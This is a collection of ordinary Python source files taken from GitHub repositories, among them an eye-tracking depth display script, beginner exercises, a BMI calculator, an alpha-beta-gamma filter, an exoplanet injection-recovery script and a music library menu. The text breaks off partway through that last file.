port to listen to pupil in eye_1_3d\n sub_1_3d = context.socket(zmq.SUB)\n sub_1_3d.connect(b\"tcp://%s:%s\" %(addr.encode('utf-8'),sub_port))\n sub_1_3d.setsockopt(zmq.SUBSCRIBE, b'pupil.1.3d')\n\n need_calculate = input(\"Start Calculating convert matrix?(Y/n) : \")\n\n if (need_calculate.upper() == \"Y\") :\n convert_matrix = make_convert_matrix(sub_1_3d)\n print(\"convert matrix : \", convert_matrix)\n np.save('./convert_matrix',convert_matrix)\n\n input(\"Start convert filtered image(press enter)\")\n time_0 = time.time()\n\n # Start convert filtered image\n try:\n while True:\n current_time = time.time()\n\n # Collect Data from pupil_tracker & Wait for a coherent pair of frames: depth and color\n sub_1_3d.connect(b\"tcp://%s:%s\" %(addr.encode('utf-8'),sub_port))\n topic,msg_1 = sub_1_3d.recv_multipart() # pupil tracker (maximum 120Hz)\n\n frames = pipeline.wait_for_frames() # realsense (maximum 30Hz)\n\n aligned_frames = align.process(frames)\n\n depth_frame = aligned_frames.get_depth_frame()\n color_frame = aligned_frames.get_color_frame()\n\n if not depth_frame or not color_frame:\n continue\n\n message_1 = loads(msg_1)\n theta = 
message_1[b'theta']\n phi = message_1[b'phi']\n\n # Filter the depth frame\n depth_frame = spatial.process(depth_frame)\n depth_frame = hole_filling.process(depth_frame)\n\n # Convert images to numpy arrays\n depth_image = np.asanyarray(depth_frame.get_data())\n diopter_image = 1000.0/depth_image\n color_image = np.asanyarray(color_frame.get_data())\n # breakpoint()\n\n # Apply colormap on depth image (image must be converted to 8-bit per pixel first)\n # depth_colormap = cv2.applyColorMap(cv2.convertScaleAbs(depth_image, alpha=0.085), cv2.COLORMAP_JET)\n depth_colormap = cv2.applyColorMap(cv2.convertScaleAbs(diopter_image, alpha=63.75), cv2.COLORMAP_JET)\n #depth_colormap = cv2.applyColorMap(cv2.convertScaleAbs(depth_image, alpha=0.03), cv2.COLORMAP_JET)\n\n # Check tracking point on images\n converted_theta, converted_phi = convert_pupil_to_realsense(theta, phi)\n\n H, W = color_image.shape[0], color_image.shape[1]\n point_y = int(H/2 + H/2 * (np.tan(converted_theta) / np.tan(COLOR_CAMERA_MAX_THETA)))\n point_x = int(W/2 + W/2 * (np.tan(converted_phi) / np.tan(COLOR_CAMERA_MAX_PHI)))\n point_y = np.clip(point_y, 0, H-1)\n point_x = np.clip(point_x, 0, W-1)\n\n # depth_colormap = cv2.circle(depth_colormap, (point_x, point_y), 5, (0,0,255), -1)\n # text = \"depth : \" + str(depth_image[point_y][point_x]) + \"mm\"\n # depth_colormap = cv2.putText(depth_colormap, text, (10,30), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2)\n\n \n #filtered_image = color_image\n # filtered_image, _ = full_rendering_display(color_image, depth_image, depth_image[point_y][point_x] / 1000.0)\n filtered_image, _ = rendering_display(color_image, depth_image, depth_image[point_y][point_x] / 1000.0, num_slicing_imgs = num_slicing_imgs)\n filtered_image = cv2.circle(filtered_image, (point_x, point_y), 5, (0,0,255), -1)\n # color_image = cv2.circle(color_image, (point_x, point_y), 5, (0,0,255), -1)\n\n # print(\"time : \", round(current_time - time_0, 4))\n # print(\"theta, phi : \", theta, phi)\n # print(\"position(x,y), depth : \", point_x, point_y, depth_image[point_y][point_x], \"\\n\")\n\n\n # Show images\n cv2.namedWindow('Convert_filtered_image', cv2.WND_PROP_FULLSCREEN)\n cv2.resizeWindow(\"Convert_filtered_image\", resolution[0], resolution[1])\n cv2.moveWindow('Convert_filtered_image', screen.x - 1, screen.y - 1)\n cv2.setWindowProperty('Convert_filtered_image', cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\n\n display_filtered_image = cv2.copyMakeBorder(filtered_image, int((resolution[1]-filtered_image.shape[0])/2), int((resolution[1]-filtered_image.shape[0])/2), int((resolution[0]-filtered_image.shape[1])/2), int((resolution[0]-filtered_image.shape[1])/2), 0)\n #display_filtered_image = filtered_image\n\n cv2.imshow('Convert_filtered_image', display_filtered_image)\n\n images = np.hstack((color_image, depth_colormap))\n cv2.namedWindow('original_image', cv2.WINDOW_AUTOSIZE)\n cv2.imshow('original_image', images)\n cv2.waitKey(1)\n\n sub_1_3d.disconnect(b\"tcp://%s:%s\" %(addr.encode('utf-8'),sub_port))\n\n finally:\n # Stop streaming\n pipeline.stop()\n sub_1_3d.disconnect(b\"tcp://%s:%s\" %(addr.encode('utf-8'),sub_port))","repo_name":"wogur110/OEQE_project","sub_path":"display_filtered_image.py","file_name":"display_filtered_image.py","file_ext":"py","file_size_in_byte":17918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"42017552411","text":"List = []\n\nsize = int(input(\"Input number of elements of list: \"))\n\nfor i in range(size):\n 
element = int(input(\"List[\" + str(i) + \"] = \"))\n List.append(element)\n\n\n\nprint(\"Input elements you want to swap in list: \")\n\nPos_1 = int(input(\"Position 1: \"))\nPos_2 = int(input(\"Position 2: \"))\n\nprint(\"Original List:\", List)\ntempt = List[Pos_1]\nList[Pos_1] = List[Pos_2]\nList[Pos_2] = tempt\nprint(\"Swapped List:\", List)\n","repo_name":"giang09101999/Data","sub_path":"Python/Data type/List/Exercises/Swap two elements in a list.py","file_name":"Swap two elements in a list.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"258029939","text":"import logging\nimport os\nimport queue\nimport random\nimport threading\nimport time\n\nfrom collections import namedtuple\nfrom os import listdir, walk\nfrom os.path import isfile, join\n\nlogging.basicConfig(level=logging.DEBUG,\n format='(%(threadName)-9s) %(message)s',)\n\nBUF_SIZE = 2\nq = queue.Queue(maxsize=BUF_SIZE)\nBUF_OBJECT_SIZE = 1024*1024*25\n\nBufferObject = namedtuple(\"BufferObject\", \"buffer filepath index\")\n\n\nclass ProducerThread(threading.Thread):\n def __init__(self, src, name=None):\n super(ProducerThread, self).__init__()\n self.name = name\n self.src = src\n\n def run(self):\n logging.debug(\"producer started!\")\n for r, d, f in os.walk(self.src):\n for file in f:\n filepath = os.path.join(r, file)\n with open(filepath, \"rb\", buffering=0) as file:\n current_loc = 0\n file.seek(current_loc)\n while current_loc < os.path.getsize(filepath):\n buffer = BufferObject(\n buffer=file.read(BUF_OBJECT_SIZE),\n filepath=filepath, index=current_loc)\n current_loc += BUF_OBJECT_SIZE\n q.put(buffer)\n\n\nclass ConsumerThread(threading.Thread):\n def __init__(self, src, dest, name=None):\n super(ConsumerThread, self).__init__()\n self.name = name\n self.src = src\n self.dest = dest\n\n def run(self):\n logging.debug(\"consumer started!\")\n\n src_size = self.get_dir_size(self.src)\n bytes_copied = 0\n\n while bytes_copied < src_size:\n while q.qsize() > 0:\n buffer = q.get()\n logging.debug('Got ' + str(buffer.filepath) + ' from q')\n filepath = buffer.filepath.replace(self.src, self.dest)\n dir_name = os.path.dirname(filepath)\n\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n\n if not os.path.exists(filepath):\n open(filepath, 'w').close()\n\n with open(filepath, \"r+b\", buffering=0) as file:\n logging.debug('writing to:' + str(filepath))\n file.seek(buffer.index)\n file.write(buffer.buffer)\n bytes_copied += len(buffer.buffer)\n time.sleep(random.random())\n\n def get_dir_size(self, start_path):\n total_size = 0\n for dirpath, dirnames, filenames in os.walk(start_path):\n for f in filenames:\n fp = os.path.join(dirpath, f)\n total_size += os.path.getsize(fp)\n return total_size\n\n\nif __name__ == \"__main__\":\n start = time.time()\n\n src = \"enter path here\"\n dest = \"enter path here\"\n\n p = ProducerThread(name='producer', src=src)\n c = ConsumerThread(name='consumer', src=src, dest=dest)\n\n p.start()\n time.sleep(1)\n c.start()\n time.sleep(1)\n\n p.join()\n c.join()\n\n end = time.time()\n print(end - start)\n","repo_name":"KaTaiHo/FastCopy","sub_path":"fastcopy.py","file_name":"fastcopy.py","file_ext":"py","file_size_in_byte":3063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"12301633373","text":"soma = 0\r\nlixo = 0\r\n\r\nfor i in range(1, 7):\r\n num = float(input('digite um numero quantas vezes pedir '))\r\n\r\n if 
num % 2 == 0:\r\n soma = soma + num\r\n else:\r\n lixo = lixo + num\r\n\r\nprint(soma)\r\n","repo_name":"LiR4/ex-python","sub_path":"ex/ex-21.py","file_name":"ex-21.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"44709610257","text":"from guitar_class import Guitar\n\nprint(\"My Guitars!\")\n\nguitars = []\nname = input(\"Name:\")\n\nwhile name != \"\":\n year = int(input(\"Year:\"))\n cost = float(input(\"Cost:\"))\n guitar = Guitar(name, year, cost)\n guitars.append(guitar)\n print()\n name = input(\"Name:\")\n\n\nname_length = max(len(guitar.name) for guitar in guitars)\ncost_length = max(len(str(guitar.cost)) for guitar in guitars)\n\nprint()\nprint(\"These are my guitars:\")\nfor i, guitar in enumerate(guitars, 1):\n vintage_string = \"(Vintage)\" if guitar.is_vintage() else \"\"\n print(\"Guitar {}: {:{}} ({}), worth ${:.2f}{}\".format(i, guitar.name, name_length, guitar.year, guitar.cost,\n vintage_string))\n","repo_name":"Dante-Gaius/CP1404_Practicals","sub_path":"cp1404practicals/Prac_06/guitars.py","file_name":"guitars.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"22638216695","text":"import random\r\n#16 A\r\nE16a = 15 * 38\r\nprint(E16a)\r\n\r\n#16 B\r\nE16b = (3 + 4) * (5 + 6)\r\nprint(E16b)\r\n\r\n#16 C\r\nE16C = 7 / 2\r\nprint(int(E16C))\r\n\r\n#16 D\r\nE16D = 48 // 5\r\nprint(E16D)\r\n\r\n#16 E\r\nE16E = (8 + 7 + 4 + 2) / 4\r\nprint(E16E)\r\n\r\n#16 F\r\nE16F = 2 ** 10\r\nprint(int(E16F))\r\n\r\n#16 G\r\nE16G = 49 ** 0.5\r\nprint(E16G)\r\n\r\n#16 H\r\nE16H = 80 * 0.25\r\nprint(int(E16H))\r\n\r\n\r\n\r\n\r\n\r\n#18\r\n#I am 170cm tall, i.e. 5 feet and 7 inches.\r\nl = 179\r\nl2 = l % 30.48\r\nprint(\"I am \", l, \"cm tall, i.e. \", (int(l2)), \"feet,\", \"6\", \"inches.\")\r\n\r\n\r\n\r\n#19\r\n#The length of the sides of the triangle is a, b and c. Write a program \r\n#that calculates the area of the triangle using the Heron formula.\r\n#Read the values of the sides of the triangle from the keyboard. Using the\r\n#program, calculate the area of the triangle for the sides 3, 4 and 5.\r\n\r\na = 3\r\nb = 4\r\nc = 5\r\np = (a + b + c) // 2\r\nS = (p * (p - a) * (p - b) * (p - c)) ** 0.5\r\nprint(int(S))\r\n\r\n'''\r\n#20\r\nh = float(input(\"Enter your heigh: \"))\r\nw = int(input(\"Enter your weight: \"))\r\nBMI = (w / (h ** 2))\r\nprint(\"Your BMI index is \", BMI)\r\n'''\r\n\r\n#21\r\nroll1 = random.randint(1, 6)\r\nroll2 = random.randint(1, 6)\r\nroll3 = random.randint(1, 6)\r\ns1 = roll3 + roll2 + roll1\r\nr = f\"The 1 roll is: {roll1};\\nThe 2 roll is: {roll2};\\nThe 3 roll is: {roll3}.\"\r\ns = f\"The sum of 3 rolls is: {s1}.\"\r\nprint(r)\r\nprint(s)\r\n\r\n\r\n#23\r\n#23% VAT was paid from the amount of PLN 15.84. Calculate and display VAT.\r\n# Apply formatting with decimal places. 
Sample result:\r\n#Amount : 15.84 zł\r\n#VAT 23% : 3.64 zł\r\na = int(input(\"Enter your full amount: \"))\r\nv = a * 0.23\r\nprint(\"Amount : \", a)\r\nprint(\"VAT 23% : \", v)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"DmytroKorodchenkov/HW_0","sub_path":"HW_0.py","file_name":"HW_0.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"11586787477","text":"from tkinter import *\n#main/root window \nroot = Tk()\n#setting window size & title\nroot.geometry(\"600x600\")\nroot.title(\"Simple B.M.I calculator\")\n#adding background\nC = Canvas(root,bg=\"purple\",height=200,width=200).grid()\nfileName = PhotoImage(file = \"background.png\")\nbackground_label=Label(root , image=fileName)\nbackground_label.place(x=0,y=0,relwidth=1,relheight=1) \n#entry widgets\nw_entry = Entry(root,width=10)\nw_entry.grid(row=4,column=3,padx=10,pady=10,columnspan=2)\nh_entry = Entry(root,width=10)\nh_entry.grid(row=4,column=5,padx=10,pady=10,columnspan=2)\n#function for entry weight and height and calculating the BMI \n#BMI formula = weight(kg) / height^2 (m)\ndef Calculate():\n weight = float(w_entry.get())\n height = float(h_entry.get())\n BMI = round(weight/height**2,2)\n bg_color = \"\"\n result = \"\"\n #checking if : underweight , normal weight , overweight \n if(BMI < 18.5):\n bg_color = \"red\"\n result = \"Underweight\" \n if(BMI >= 18.5 and BMI <=24.9):\n bg_color = \"Green\"\n result = \"Normal Weight\"\n if(BMI >= 25.0):\n bg_color = \"Red\"\n result = \"Overweight\" \n BMI_label = Label(root,text=\"BMI : {0} {1}\".format(BMI,result) , bg=bg_color).grid(row=8,column=8)\n#widgets\nw_label = Label(root,text=\"Weight(in kg)\").grid(row=3,column=3) \nh_label = Label(root,text=\"Height(in m)\").grid(row=3,column=5)\nr_label = Label(root,text=\"BMI\").grid(row=6,column=3)\ncalc_btn = Button(root,text=\"Calculate\",command=Calculate).grid(row=8,column=3,padx=10,pady=10)\nroot.mainloop() ","repo_name":"CarlosArro2001/BMI_Calculator_Tkinter","sub_path":"BMI_app.py","file_name":"BMI_app.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"43280362017","text":"\"\"\" Alpha-Beta-Gamma Filter Implementation\n\nBased on the examples:\nhttps://www.kalmanfilter.net/alphabeta.html\n\"\"\"\n\nimport math\nimport numpy as np\n\n\nclass AlphaBetaGammaFilter():\n def __init__(\n self, \n alpha:float = 1.0,\n beta:float = 1.0,\n gamma:float = 1.0,\n delta_t:float = 1.0\n ) -> None:\n \"\"\" Alpha-Beta-Gamma Filter class for tracking\n \n Input:\n alpha: (float) multiplier for position prediction equation (0.0 <= alpha <= 1.0)\n beta: (float) multiplier for velocity prediction equation (0.0 <= beta <= 1.0)\n gamma: (float) multiplier for acceleration prediction equation (0.0 <= gamma <= 1.0)\n delta_t: (float) timing interval\n \n Return: None\n \"\"\"\n self.alpha = alpha\n self.beta = beta\n self.gamma = gamma\n \n self.delta_t = delta_t\n self.timer = 0\n \n # State update equation variables\n # This is for estimating the current position, velocity, and acceleration\n # considering previous estimates and the current measurement\n self.measured_pos = 0.0 # measured position\n self.current_x = 0.0 # initial (current) position\n self.current_v = 0.0 # initial (current) velocity\n self.current_a = 0.0 # initial (current) acceleration\n \n # State extrapolation variables\n # This is for predicting position, velocity, 
and acceleration for next time frame\n # We use the \"current\" variables to predict the below attributes\n self.pred_x = 0.0\n self.pred_v = 0.0\n self.pred_a = 0.0\n \n\n def initialize(\n self, \n x:float = None, \n v:float = None, \n a:float = None\n ) -> None:\n \"\"\" Initialize initial conditions (position, velocity, and acceleration)\"\"\"\n self.current_x = x\n self.current_v = v\n self.current_a = a\n \n # With initial conditions set, predict for an initial guess\n self.pred_x = self.current_x + self.current_v * self.delta_t + (0.5 * self.current_a * self.delta_t**2)\n self.pred_v = self.current_v + self.current_a * self.delta_t\n self.pred_a = self.current_a\n \n print('Position (t={}): {}'.format(self.timer,self.pred_x))\n print('Velocity (t={}): {}'.format(self.timer,self.pred_v))\n print('Acceleration (t={}): {}'.format(self.timer,self.pred_a))\n \n\n def update(\n self,\n z:float = None\n ) -> None:\n \"\"\" Compute:\n i) current estimate with state update equations\n ii) next state estimate (prediction)\n \"\"\"\n # Update timer first...\n self.timer += 1\n self.current_x = self.pred_x\n self.current_v = self.pred_v\n self.current_a = self.pred_a\n \n # Compute current estimate\n x = self.current_x\n diff = z - x\n self.current_x = x + self.alpha * diff\n self.current_v = self.current_v + self.beta * (diff / self.delta_t)\n self.current_a = self.current_a + self.gamma * (diff / (0.5 * self.delta_t**2))\n \n print('Position Est. (t={}): {}'.format(self.timer,self.current_x))\n print('Velocity Est. (t={}): {}'.format(self.timer,self.current_v))\n print('Acceleration Est. (t={}): {}'.format(self.timer,self.current_a))\n \n \n # Compute prediction for current time\n self.pred_x = self.current_x + self.current_v * self.delta_t + (0.5 * self.current_a * self.delta_t**2)\n self.pred_v = self.current_v + self.current_a * self.delta_t\n self.pred_a = self.current_a\n \n print('Position (t={}): {}'.format(self.timer,self.pred_x))\n print('Velocity (t={}): {}'.format(self.timer,self.pred_v))\n print('Acceleration (t={}): {}'.format(self.timer,self.pred_a))\n \n\n\nif __name__ == \"__main__\":\n abg_filter = AlphaBetaGammaFilter(\n alpha=0.5, \n beta=0.4, \n gamma=0.1, \n delta_t=5\n )\n \n abg_filter.initialize(\n x=30000,\n v=50,\n a=0\n )\n \n abg_filter.update(z=30160)\n abg_filter.update(z=30365)\n \n","repo_name":"ManuelSerna/cv-notes","sub_path":"estimation/filters/AlphaBetaGammaFilter.py","file_name":"AlphaBetaGammaFilter.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"23276096446","text":"#Runs an injection recovery for a given light curve. Each iteration injects a different random period and planet radius, performs a periodogram analysis to try and find the period, \n#and outputs a 0 or 1 depending on whether the correct period was recovered or not. It is output into a pandas table column as ['recover?']. Plotting script is also included.\n#####normalized_corrected: a processed light curve that will be used for the injection recovery\n#####stellar_radius: the radius of the star in solar radii\n#####trials: number of injected planets to try for the injected recovery. 
Recommend more than 1000 since the statistics are a bit iffy when a lower value is selected\n\nimport numpy as np\nimport pandas as pd\nimport lightkurve as lk\nimport astropy.units as u\nimport batman\nfrom astropy.timeseries import BoxLeastSquares\n\n\ndef vary_params(normalized_corrected, stellar_radius=1.325, trials=1000):\n output_table = pd.DataFrame()\n Rplanet = []\n Pinject = []\n Pdetermine = []\n recover = []\n \n #print(output_table['depth'])\n rad_min = 0.02115/stellar_radius #now in R_hoststar\n rad_max = 0.2/stellar_radius #now in R_hoststar\n \n depths = np.random.uniform(rad_min, rad_max, trials) # random transit depths to inject\n midtimes = np.random.uniform(min(normalized_corrected.time.value), max(normalized_corrected.time.value), trials) # mid-transit times to inject if you want\n periods = np.random.uniform(0.3,18,trials) # periods to inject\n\n for depth, midtime, period in zip(depths, midtimes, periods):\n params = batman.TransitParams() #object to store transit parameters\n params.t0 = midtime #time of inferior conjunction\n params.per = period #orbital period\n params.rp = depth #planet radius (in units of stellar radii)\n semimaj = ((((7.496*(10**(-6)))*(period**2))**(1/3))*215.032)/stellar_radius #calc a based on period, and in terms of host star radius\n params.a = semimaj #semi-major axis (in units of stellar radii)\n params.inc = 89. #orbital inclination (in degrees)\n params.ecc = 0. #eccentricity\n params.w = 90. \n params.u = [0.1, 0.3] #limb darkening coefficients [u1, u2]\n params.limb_dark = \"quadratic\" #limb darkening model\n\n # Define the times at which to evaluate the fake transit\n t=normalized_corrected.time.value\n\n # Create the batman transit model\n m = batman.TransitModel(params, t)\n\n # Generate the fake light curve transit\n injected_model = m.light_curve(params)\n\n\n # Inject the fake transit into the real data\n injected_flux = normalized_corrected.flux.value + injected_model - 1.0\n\n\n lc_injected=normalized_corrected.copy()\n lc_injected.flux = injected_flux\n #fig,axs=plt.subplots(3,1,figsize=(10,10))\n planetrad = depth*stellar_radius * 9.73116 #convert the solar radii to jupiter radii\n #lc_injected.scatter(ax=axs[0],s=25,color='r',label='injected transit signal')\n #normalized_corrected.scatter(ax=axs[0],s=25)\n\n period_grid = np.linspace(0.4, 18, 1000)\n bls = lc_injected.to_periodogram(method='bls', period=period_grid, frequency_factor=500);\n #bls.plot(ax=axs[1],label=f'best p = {bls.period_at_max_power:.2f}');\n planet_b_period = bls.period_at_max_power\n planet_b_t0 = bls.transit_time_at_max_power\n planet_b_dur = bls.duration_at_max_power\n #lc_injected.fold(period=planet_b_period, epoch_time=planet_b_t0).scatter(ax=axs[2],label='')\n\n blsorig = normalized_corrected.to_periodogram(method='bls', period=period_grid, frequency_factor=500);\n origplanet_b_period = blsorig.period_at_max_power\n detectorig = abs((origplanet_b_period.value/period)-round(origplanet_b_period.value/period))\n\n detect = abs((planet_b_period.value/period)-round(planet_b_period.value/period))\n\n #axs[0].set_title(f'Rplanet(Rjup Radii) = {planetrad:.4f}, Midtime = {midtime:.2f}, Period = {period:.2f},operiod = {origplanet_b_period:.2f}')\n\n\n #print(f'detectval={detect}')\n accept_thresh=0.05\n if detectorig < accept_thresh:\n found = 0 #\"False\"\n\n elif detect < accept_thresh:\n found = 1 #\"True\"\n else:\n found = 0 #\"False\"\n\n #print(f'depth: {planetrad:.4f} actual:{period:.4f} calc:{planet_b_period:.4f} Recover?:{found}')\n 
Rplanet.append(planetrad)\n Pinject.append(period)\n Pdetermine.append(planet_b_period.value)\n recover.append(found)\n\n output_table['Rplanet'] = Rplanet\n output_table['Pinject'] = Pinject\n output_table['Pdetermine'] = Pdetermine\n output_table['recover?'] = recover\n \n return output_table\n\n\n\n\noutput_table = output_table\n\nradlist1=np.linspace(0.2,1.9,18)\nradlist2=np.linspace(0.3,2,18)\n\ndetectionmatrix = np.empty((1,18))\n\nfor r1,r2 in zip(radlist1,radlist2):\n p1 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(0, 1))]\n recoverpercentp1 = (p1['recover?'].sum())/len(p1.index)\n #print(recoverpercentp1)\n\n p2 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(1, 2))]\n recoverpercentp2 = (p2['recover?'].sum())/len(p2.index)\n #print(recoverpercentp2)\n\n p3 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(2, 3))]\n recoverpercentp3 = (p3['recover?'].sum())/len(p3.index)\n #print(recoverpercentp3)\n\n p4 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(3, 4))]\n recoverpercentp4 = (p4['recover?'].sum())/len(p4.index)\n #print(recoverpercentp4)\n\n p5 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(4, 5))]\n recoverpercentp5 = (p5['recover?'].sum())/len(p5.index)\n #print(recoverpercentp5)\n\n p6 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(5, 6))]\n recoverpercentp6 = (p6['recover?'].sum())/len(p6.index)\n #print(recoverpercentp6)\n\n p7 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(6, 7))]\n recoverpercentp7 = (p7['recover?'].sum())/len(p7.index)\n #print(recoverpercentp7)\n\n p8 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(7, 8))]\n recoverpercentp8 = (p8['recover?'].sum())/len(p8.index)\n #print(recoverpercentp8)\n\n p9 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(8, 9))]\n recoverpercentp9 = (p9['recover?'].sum())/len(p9.index)\n #print(recoverpercentp9)\n #print(' ')\n\n \n p10 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(9, 10))]\n recoverpercentp10 = (p10['recover?'].sum())/len(p10.index)\n #print(recoverpercentp1)\n\n p11 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(10, 11))]\n recoverpercentp11 = (p11['recover?'].sum())/len(p11.index)\n #print(recoverpercentp2)\n\n p12 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(11, 12))]\n recoverpercentp12 = (p12['recover?'].sum())/len(p12.index)\n #print(recoverpercentp3)\n\n p13 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(12, 13))]\n recoverpercentp13 = (p13['recover?'].sum())/len(p13.index)\n #print(recoverpercentp4)\n\n p14 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(13, 14))]\n recoverpercentp14 = (p14['recover?'].sum())/len(p14.index)\n #print(recoverpercentp5)\n\n p15 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(14, 15))]\n recoverpercentp15 = (p15['recover?'].sum())/len(p15.index)\n #print(recoverpercentp6)\n\n p16 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(15, 16))]\n recoverpercentp16 = 
(p16['recover?'].sum())/len(p16.index)\n #print(recoverpercentp7)\n\n p17 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(16, 17))]\n recoverpercentp17 = (p17['recover?'].sum())/len(p17.index)\n #print(recoverpercentp8)\n\n p18 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(17, 18))]\n recoverpercentp18 = (p18['recover?'].sum())/len(p18.index) \n \n matrixgrid = np.array([[recoverpercentp1,recoverpercentp2,recoverpercentp3,recoverpercentp4,recoverpercentp5,\n recoverpercentp6,recoverpercentp7,recoverpercentp8,recoverpercentp9,recoverpercentp10,\n recoverpercentp11,recoverpercentp12,recoverpercentp13,recoverpercentp14,\n recoverpercentp15,recoverpercentp16,recoverpercentp17,recoverpercentp18]])\n detectionmatrix = np.concatenate((detectionmatrix, matrixgrid), axis=0)\n\ndetectionmatrix = np.delete(detectionmatrix, obj=0, axis=0)\n\n\n\nfig, ax = plt.subplots(figsize=(10, 10))\n# Using matshow here just because it sets the ticks up nicely. imshow is faster.\nax.matshow(detectionmatrix, cmap='plasma')\n\nfor (i, j), z in np.ndenumerate(detectionmatrix):\n ax.text(j, i, '{:0.3f}'.format(z), ha='center', va='center')\n ax.margins(x=0)\n\nax.set_xticks([-0.5,0.5,1.5,2.5,3.5,4.5,5.5,6.5,7.5,8.5,9.5,10.5,11.5,12.5,13.5,14.5,15.5,16.5,17.5])\nax.set_xticklabels([0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18])\n\nax.set_yticks([-0.5,0.5,1.5,2.5,3.5,4.5,5.5,6.5,7.5,8.5,9.5,10.5,11.5,12.5,13.5,14.5,15.5,16.5,17.5])\nax.set_yticklabels([0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1,1.1,1.2,1.3,1.4,1.5,1.6,1.7,1.8,1.9,2])\n\nplt.gca().invert_yaxis()\n\nplt.tick_params(labelbottom=True, labeltop=False)\nplt.title(f'INSERT TITLE HERE')\nplt.xlabel('Period [days]')\nplt.ylabel('R_planet [R_Jup]')\n\n#plt.xscale('log')\n\n#ax.scatter(output_table['Pinject'],output_table['Rplanet'])\n\nplt.show() \n","repo_name":"billy210/research","sub_path":"inject-recover.py","file_name":"inject-recover.py","file_ext":"py","file_size_in_byte":10220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"15187067387","text":"import os\nimport sys\nimport time\nimport music_reports\nimport print_ascii_art\nfrom prettytable import PrettyTable\n\n\ndef display_menu():\n os.system(\"clear\")\n print_ascii_art.print_starting_art()\n loop = True\n while loop:\n albums_list = []\n albums_list = music_reports.import_library(albums_list)\n choice = input(\"\"\"\n1: View all imported albums\n2: Find albums by genre\n3: Find albums from given time range\n4: Find shortest/longest album\n5: Find albums created by given artist\n6: Find album by name\n7: Generate full report\n8: Add new album\n9: Delete album\n10: Exit\n What you want to do? \"\"\")\n\n if choice == \"1\":\n os.system(\"clear\")\n music_reports.drawing_table(albums_list)\n\n elif choice == \"2\":\n os.system(\"clear\")\n music_reports.find_by_genre(albums_list)\n\n elif choice == \"3\":\n loop2 = True\n while loop2:\n os.system(\"clear\")\n search_by_year_option = input(\"\"\"\n1: Search for albums made in given year\n2: Search for albums made between years (yyyy-yyyy)\n What you want to do? 
\"\"\")\n\n if search_by_year_option == \"1\":\n os.system(\"clear\")\n music_reports.find_albums_made_in_given_year(albums_list)\n loop2 = False\n\n elif search_by_year_option == \"2\":\n os.system(\"clear\")\n music_reports.find_albums_made_between_years(albums_list)\n loop2 = False\n\n else:\n os.system(\"clear\")\n print(\"Next time please enter '1' or '2'\")\n time.sleep(3)\n os.system(\"clear\")\n continue\n\n elif choice == \"4\":\n os.system(\"clear\")\n loop3 = True\n while loop3:\n search_shortest_longest_album = input(\"\"\"\n1: Search for longest album\n2: Search for shortest album\n What you want to do? \"\"\")\n if search_shortest_longest_album == \"1\":\n os.system(\"clear\")\n music_reports.find_longest_album(albums_list)\n loop3 = False\n\n elif search_shortest_longest_album == \"2\":\n os.system(\"clear\")\n loop3 = False\n music_reports.find_shortest_album(albums_list)\n\n else:\n os.system(\"clear\")\n print(\"Next time please enter '1' or '2'\")\n time.sleep(3)\n os.system(\"clear\")\n continue\n\n elif choice == \"5\":\n os.system(\"clear\")\n music_reports.find_by_artist(albums_list)\n\n elif choice == \"6\":\n os.system(\"clear\")\n music_reports.find_by_name(albums_list)\n\n elif choice == \"7\":\n os.system(\"clear\")\n music_reports.find_longest_album(albums_list)\n music_reports.find_shortest_album(albums_list)\n music_reports.oldest_or_youngest_album(albums_list, \"youngest\")\n music_reports.oldest_or_youngest_album(albums_list, \"oldest\")\n music_reports.amount_of_albums(albums_list)\n music_reports.albums_by_genres(albums_list)\n\n elif choice == \"8\":\n os.system(\"clear\")\n music_reports.add_album()\n\n elif choice == \"9\":\n os.system(\"clear\")\n music_reports.drawing_table(albums_list)\n 